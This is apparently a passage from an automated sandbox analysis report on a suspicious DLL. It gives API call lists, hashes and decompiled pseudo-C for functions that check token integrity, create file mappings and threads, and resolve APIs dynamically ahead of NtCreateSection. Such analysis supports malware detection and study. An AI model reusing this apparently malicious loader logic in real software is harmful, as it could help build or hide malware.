                                          0x00c79c77
                                          0x00c79c87
                                          0x00c79c87
                                          0x00000000
                                          0x00c79cb8
                                          0x00c79cb8
                                          0x00c79cbd
                                          0x00c79cdc
                                          0x00c79cde
                                          0x00c79ce3
                                          0x00c79ce4
                                          0x00000000
                                          0x00c79cbf
                                          0x00c79cbf
                                          0x00c79cc5
                                          0x00000000
                                          0x00c79cc7
                                          0x00c79cc7
                                          0x00c79ccc
                                          0x00c79cce
                                          0x00c79cd3
                                          0x00c79cd4
                                          0x00c79cea
                                          0x00c79cea
                                          0x00c79cf2
                                          0x00c79d00
                                          0x00c79d04
                                          0x00c79d10
                                          0x00c79d12
                                          0x00c79d16
                                          0x00c79d18
                                          0x00000000
                                          0x00c79d1e
                                          0x00000000
                                          0x00c79d1e
                                          0x00c79d18
                                          0x00c79cc5
                                          0x00000000
                                          0x00c79cbd
                                          0x00c79c8b
                                          0x00c79c8d
                                          0x00c79c91
                                          0x00c79c92
                                          0x00c79c92
                                          0x00c79c96
                                          0x00c79ca0
                                          0x00c79ca0
                                          0x00c79ca6
                                          0x00c79ca9
                                          0x00c79ca9
                                          0x00c79cb0
                                          0x00c79cb0
                                          0x00c79d37
                                          0x00000000

                                          APIs
                                          • memset.NTDLL ref: 00C79B89
                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00C79B95
                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00C79BBD
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00C79BDD
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00C74AC4,?), ref: 00C79BF8
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000), ref: 00C79CA0
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000,?,?), ref: 00C79CB0
                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00C79CEA
                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00C79D04
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00C79D10
                                            • Part of subcall function 00C768CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03139388,00000000,?,7519F710,00000000,7519F730), ref: 00C7691E
                                            • Part of subcall function 00C768CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,031393C0,?,00000000,30314549,00000014,004F0053,0313937C), ref: 00C769BB
                                            • Part of subcall function 00C768CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C79C10), ref: 00C769CD
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00C74AC4,?,00000000,?,?), ref: 00C79D23
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                          • String ID:
                                          • API String ID: 3521023985-0
                                          • Opcode ID: 49dac1a730a9457477c39c90dfa647ed46f38039af0c15039734cd650d3d00e4
                                          • Instruction ID: bc5932418189f5e15a783c167d4e1fa8ecb572f385cfb3335b26082bfb144a6a
                                          • Opcode Fuzzy Hash: 49dac1a730a9457477c39c90dfa647ed46f38039af0c15039734cd650d3d00e4
                                          • Instruction Fuzzy Hash: AB515CB1408311AFCB21AF159C44E5FBBE8FF85760F508A1DF8A992161D770CA44CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C71A4E, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E00C71A4E(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00C7B082();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xc7d2a4; // 0x24ba5a8
				_t5 = _t13 + 0xc7e836; // 0x3138dde
				_t6 = _t13 + 0xc7e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00C7AD1A();
				_t17 = CreateFileMappingW(0xffffffff, 0xc7d2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x00c71a4e
                                          0x00c71a56
                                          0x00c71a5a
                                          0x00c71a60
                                          0x00c71a65
                                          0x00c71a6a
                                          0x00c71a6d
                                          0x00c71a70
                                          0x00c71a75
                                          0x00c71a76
                                          0x00c71a79
                                          0x00c71a7e
                                          0x00c71a85
                                          0x00c71a8f
                                          0x00c71a91
                                          0x00c71a92
                                          0x00c71a95
                                          0x00c71ab1
                                          0x00c71ab7
                                          0x00c71abb
                                          0x00c71b09
                                          0x00c71abd
                                          0x00c71aca
                                          0x00c71ada
                                          0x00c71ae2
                                          0x00c71af4
                                          0x00c71af8
                                          0x00000000
                                          0x00000000
                                          0x00c71ae4
                                          0x00c71ae7
                                          0x00c71aec
                                          0x00c71aee
                                          0x00c71aee
                                          0x00c71acc
                                          0x00c71ace
                                          0x00c71afa
                                          0x00c71afb
                                          0x00c71afb
                                          0x00c71aca
                                          0x00c71b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?,?), ref: 00C71A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00C71A70
                                          • _snwprintf.NTDLL ref: 00C71A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,00C7D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00C71AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?), ref: 00C71AC3
                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00C71ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53), ref: 00C71AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00C74996,?,?,4D283A53,?), ref: 00C71B03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: e6894887132697e61bf8759ab1652dc0eca1be320e06ee379355739b7c70af55
                                          • Instruction ID: 569b6c96023efabfb8bd93b2c3565d575f94db2eb1cef39d3ffbe7bcbc4ec3c7
                                          • Opcode Fuzzy Hash: e6894887132697e61bf8759ab1652dc0eca1be320e06ee379355739b7c70af55
                                          • Instruction Fuzzy Hash: AD21F3B2600204BFC721EB68CC45F8E37B9AB84710F258164FA1DE6190EB70DA459B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C753E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 217 c753e3-c753fe 218 c75404-c7541d OpenProcessToken 217->218 219 c7549d-c754a9 217->219 220 c7541f-c7544a GetTokenInformation * 2 218->220 221 c7549c 218->221 222 c75492-c7549b CloseHandle 220->222 223 c7544c-c75459 call c758be 220->223 221->219 222->221 226 c75491 223->226 227 c7545b-c7546c GetTokenInformation 223->227 226->222 228 c7546e-c75488 GetSidSubAuthorityCount GetSidSubAuthority 227->228 229 c7548b-c7548c call c7147e 227->229 228->229 229->226
                                          C-Code - Quality: 100%
                                          			E00C753E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xc7d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00C758BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00C7147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x00c753f0
                                          0x00c753f7
                                          0x00c753fe
                                          0x00c75412
                                          0x00c7541d
                                          0x00c75435
                                          0x00c75442
                                          0x00c75445
                                          0x00c7544a
                                          0x00c75455
                                          0x00c75459
                                          0x00c75468
                                          0x00c7546c
                                          0x00c75488
                                          0x00c75488
                                          0x00c7548c
                                          0x00c7548c
                                          0x00c75491
                                          0x00c75495
                                          0x00c7549b
                                          0x00c7549c
                                          0x00c754a3
                                          0x00c754a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00C75415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00C75435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00C75445
                                          • CloseHandle.KERNEL32(00000000), ref: 00C75495
                                            • Part of subcall function 00C758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00C71C51), ref: 00C758CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00C75468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00C75470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00C75480
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 6dc44b5d8b999fe1a5b2d637d71294b809fc555eeedbdb144876f22660234c43
                                          • Instruction ID: ce3ca350dd5a1e6857fd53e3212281840e9142b7cd5d474b3bf07f12047c00b4
                                          • Opcode Fuzzy Hash: 6dc44b5d8b999fe1a5b2d637d71294b809fc555eeedbdb144876f22660234c43
                                          • Instruction Fuzzy Hash: F5213C75900219FFEB109FA4DC45EAEBF79EF44304F0080A5E515A6261C7719E85EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1954, Relevance: 10.6, APIs: 7, Instructions: 74memorythreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 231 5f1954-5f1968 232 5f19dd-5f19ea InterlockedDecrement 231->232 233 5f196a-5f196b 231->233 234 5f19ec-5f19f2 232->234 235 5f1a2a-5f1a31 232->235 233->235 236 5f1971-5f197e InterlockedIncrement 233->236 237 5f1a1e-5f1a24 HeapDestroy 234->237 238 5f19f4 234->238 236->235 239 5f1984-5f1998 HeapCreate 236->239 237->235 240 5f19f9-5f1a09 SleepEx 238->240 241 5f199a-5f19cf call 5f105a CreateThread 239->241 242 5f19d8-5f19db 239->242 243 5f1a0b-5f1a10 240->243 244 5f1a12-5f1a18 CloseHandle 240->244 241->235 247 5f19d1-5f19d4 241->247 242->235 243->240 243->244 244->237 247->242
                                          C-Code - Quality: 89%
                                          			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x5f4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x5f410c;
						if( *0x5f410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x5f4118;
								if( *0x5f4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x5f410c);
						}
						HeapDestroy( *0x5f4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x5f4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x5f4110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x5f4130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E005F103B, E005F105A(_a12, 0, 0x5f4118, _t41), 0,  &_a8); // executed
							 *0x5f410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                          0x005f1957
                                          0x005f1963
                                          0x005f1965
                                          0x005f1968
                                          0x005f19e2
                                          0x005f19e8
                                          0x005f19ea
                                          0x005f19ec
                                          0x005f19f2
                                          0x005f19f4
                                          0x005f19f9
                                          0x005f19fc
                                          0x005f1a07
                                          0x005f1a09
                                          0x00000000
                                          0x00000000
                                          0x005f1a0b
                                          0x005f1a0e
                                          0x005f1a10
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x005f1a10
                                          0x005f1a18
                                          0x005f1a18
                                          0x005f1a24
                                          0x005f1a24
                                          0x005f196a
                                          0x005f196b
                                          0x005f198b
                                          0x005f1991
                                          0x005f1996
                                          0x005f1998
                                          0x005f19d8
                                          0x005f19d8
                                          0x005f199a
                                          0x005f19a2
                                          0x005f19a9
                                          0x005f19c2
                                          0x005f19c8
                                          0x005f19cf
                                          0x005f19d4
                                          0x00000000
                                          0x005f19d4
                                          0x005f19cf
                                          0x005f1998
                                          0x005f196b
                                          0x005f1a31

                                          APIs
                                          • InterlockedIncrement.KERNEL32(005F4108), ref: 005F1976
                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 005F198B
                                          • CreateThread.KERNEL32 ref: 005F19C2
                                          • InterlockedDecrement.KERNEL32(005F4108), ref: 005F19E2
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 005F19FC
                                          • CloseHandle.KERNEL32 ref: 005F1A18
                                          • HeapDestroy.KERNEL32 ref: 005F1A24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
                                          • String ID:
                                          • API String ID: 3416589138-0
                                          • Opcode ID: c3b32e3b1867429c54d6fe4311f4bf068daf0a770c5bd08f158c9957ca87a098
                                          • Instruction ID: 2848dee4a296c0122031a762c18b3377aad5b5fcf879bb03d44add9604b7998e
                                          • Opcode Fuzzy Hash: c3b32e3b1867429c54d6fe4311f4bf068daf0a770c5bd08f158c9957ca87a098
                                          • Instruction Fuzzy Hash: F021A931A00649EFD7109F68AC88D7A7FA8FBB5750710402AF641E3150EB7C8E84EF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C7A060, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 248 c7a060-c7a0a6 SysAllocString 249 c7a0ac-c7a0d9 248->249 250 c7a1ca-c7a1ce 248->250 256 c7a0df-c7a0eb call c7a872 249->256 257 c7a1c8 249->257 251 c7a1d0-c7a1d3 SafeArrayDestroy 250->251 252 c7a1d9-c7a1dd 250->252 251->252 254 c7a1df-c7a1e2 SysFreeString 252->254 255 c7a1e8-c7a1ee 252->255 254->255 256->257 260 c7a0f1-c7a101 256->260 257->250 260->257 262 c7a107-c7a12d IUnknown_QueryInterface_Proxy 260->262 262->257 264 c7a133-c7a147 262->264 266 c7a186-c7a18b 264->266 267 c7a149-c7a14d 264->267 269 c7a1bf-c7a1c4 266->269 270 c7a18d-c7a192 266->270 267->266 268 c7a14f-c7a166 StrStrIW 267->268 272 c7a17d-c7a180 SysFreeString 268->272 273 c7a168-c7a171 call c791b5 268->273 269->257 270->269 271 c7a194-c7a19f call c71295 270->271 276 c7a1a4-c7a1a8 271->276 272->266 273->272 279 c7a173-c7a17b call c7a872 273->279 276->269 278 c7a1aa-c7a1af 276->278 280 c7a1b1-c7a1b8 278->280 281 c7a1ba 278->281 279->272 280->269 281->269
                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 00C7A09B
                                          • IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00C7A11E
                                          • StrStrIW.SHLWAPI(00000000,006E0069), ref: 00C7A15E
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7A180
                                            • Part of subcall function 00C791B5: SysAllocString.OLEAUT32(00C7C298), ref: 00C79205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 00C7A1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 00C7A1E2
                                            • Part of subcall function 00C7A872: Sleep.KERNEL32(000001F4), ref: 00C7A8BA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.521464434.0000000000C71000.00000020.00020000.sdmp, Offset: 00C70000, based on PE: true
                                          • Associated: 00000000.00000002.521417156.0000000000C70000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521608440.0000000000C7C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521660982.0000000000C7D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.521724199.0000000000C7F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_c70000_loaddll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                          • String ID:
                                          • API String ID: 2118684380-0
                                          • Opcode ID: e2e4fb0d72a4f36fc5322c304a63fe657bf6e5d0b3e83a888bc654157ff636f8
                                          • Instruction ID: d1b5698d331aaf636b563c8909e915dc120b5442188d010edacb97ab2d3fdd3a
                                          • Opcode Fuzzy Hash: e2e4fb0d72a4f36fc5322c304a63fe657bf6e5d0b3e83a888bc654157ff636f8
                                          • Instruction Fuzzy Hash: C3513336500609EFDB01DFA8C844A9EB7B6FFC8750F148469E519EB220EB71ED45CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 005F1F61, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 284 5f1f61-5f1f74 call 5f1026 287 5f1f7a-5f1faf GetModuleHandleA GetProcAddress 284->287 288 5f2036 284->288 289 5f202e-5f2034 call 5f1938 287->289 290 5f1fb1-5f1fc5 GetProcAddress 287->290 291 5f203d-5f2044 288->291 289->291 290->289 292 5f1fc7-5f1fdb GetProcAddress 290->292 292->289 294 5f1fdd-5f1ff1 GetProcAddress 292->294 294->289 296 5f1ff3-5f2007 GetProcAddress 294->296 296->289 297 5f2009-5f201b call 5f1a34 296->297 299 5f2020-5f2025 297->299 299->289 300 5f2027-5f202c 299->300 300->291
                                          C-Code - Quality: 100%
                                          			E005F1F61(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E005F1026(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x5f4144 + 0x5f5014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x5f4144 + 0x5f514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E005F1938(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x5f4144 + 0x5f515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x5f4144 + 0x5f516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x5f4144 + 0x5f5184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x5f4144 + 0x5f519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E005F1A34(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                          0x005f1f70
                                          0x005f1f74
                                          0x005f2036
                                          0x005f1f7a
                                          0x005f1f92
                                          0x005f1fa1
                                          0x005f1fa8
                                          0x005f1faa
                                          0x005f1faf
                                          0x005f202e
                                          0x005f202f
                                          0x005f1fb1
                                          0x005f1fbe
                                          0x005f1fc0
                                          0x005f1fc5
                                          0x00000000
                                          0x005f1fc7
                                          0x005f1fd4
                                          0x005f1fd6
                                          0x005f1fdb
                                          0x00000000
                                          0x005f1fdd
                                          0x005f1fea
                                          0x005f1fec
                                          0x005f1ff1
                                          0x00000000
                                          0x005f1ff3
                                          0x005f2000
                                          0x005f2002
                                          0x005f2007
                                          0x00000000
                                          0x005f2009
                                          0x005f200f
                                          0x005f2014
                                          0x005f201b
                                          0x005f2020
                                          0x005f2025
                                          0x00000000
                                          0x005f2027
                                          0x005f202a
                                          0x005f202a
                                          0x005f2025
                                          0x005f2007
                                          0x005f1ff1
                                          0x005f1fdb
                                          0x005f1fc5
                                          0x005f1faf
                                          0x005f2044

                                          APIs
                                            • Part of subcall function 005F1026: HeapAlloc.KERNEL32(00000000,?,005F1329,00000208,?,-00000008,?,?,?,005F122F,?), ref: 005F1032
                                          • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,005F1B06,?,?,?,?,00000002,?,?), ref: 005F1F86
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FA8
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FBE
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FD4
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F1FEA
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 005F2000
                                            • Part of subcall function 005F1A34: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005F1A91
                                            • Part of subcall function 005F1A34: memset.NTDLL ref: 005F1AB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.519649525.00000000005F0000.00000040.00020000.sdmp, Offset: 005F0000, based on PE: true
                                          • Associated: 00000000.00000002.519749348.00000000005F5000.00000040.00020000.sdmp Download File
                                          • Associated: 00000000.00000002.519817057.00000000005F7000.00000040.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5f0000_loaddll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                          • String ID:
                                          • API String ID: 1632424568-0
                                          • Opcode ID: 81a4bb87834f69f5de39cd7187f86fdd6a25c13615bbf630cd1b2d1a9519ff7c
                                          • Instruction ID: d58b5e67ae6deb2e8eda3f2587ae4c516c0a54511d4714059167ae05e1b3f282
                                          • Opcode Fuzzy Hash: 81a4bb87834f69f5de39cd7187f86fdd6a25c13615bbf630cd1b2d1a9519ff7c
                                          • Instruction Fuzzy Hash: BC214DB160060A9FD721DF6ADD88E7ABBECBB14300B00445AE605D7261EB79F944CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C77C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 301 c77c75-c77c88 302 c77c8f-c77c93 StrChrA 301->302 303 c77c95-c77ca6 call c758be 302->303 304 c77c8a-c77c8e 302->304 307 c77ceb 303->307 308 c77ca8-c77cb4 StrTrimA 303->308 304->302 310 c77ced-c77cf4 307->310 309 c77cb6-c77cbf StrChrA 308->309 311 c77cd1-c77cdd 309->311 312 c77cc1-c77ccb StrTrimA 309->312 311->309 313 c77cdf-c77ce9 311->313 312->311 313->310
                                          C-Code - Quality: 54%
                                          			E00C77C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E00C758BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0xc7c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0xc7c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x00c77c80
                                          0x00c77c84
                                          0x00c77c86
                                          0x00c77c87
                                          0x00c77c8f
                                          0x00c77c8f
                                          0x00c77c93
                                          0x00000000
                                          0x00000000
                                          0x00c77c8a
                                          0x00c77c8b
                                          0x00c77c8e
                                          0x00c77c8e
                                          0x00c77c9b
                                          0x00c77ca0
                                          0x00c77ca6
                                          0x00c77cae
                                          0x00c77cb4
                                          0x00c77cb6
                                          0x00c77cbb
                                          0x00c77cbf
                                          0x00c77cc1
                                          0x00c77cc4
                                          0x00c77ccb
                                          0x00c77ccb
                                          0x00c77cd1
                                          0x00c77cd5
                                          0x00c77cd8
                                          0x00c77cd9
                                          0x00c77cdb
                                          0x00c77ce3
                                          0x00c77ce7
                                          0x00c77ce7
                                          0x00c77cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,031395AC,?,?,?,00C74C85,031395AC,?,?,?,00C74A8B,?,?,?), ref: 00C77C8F
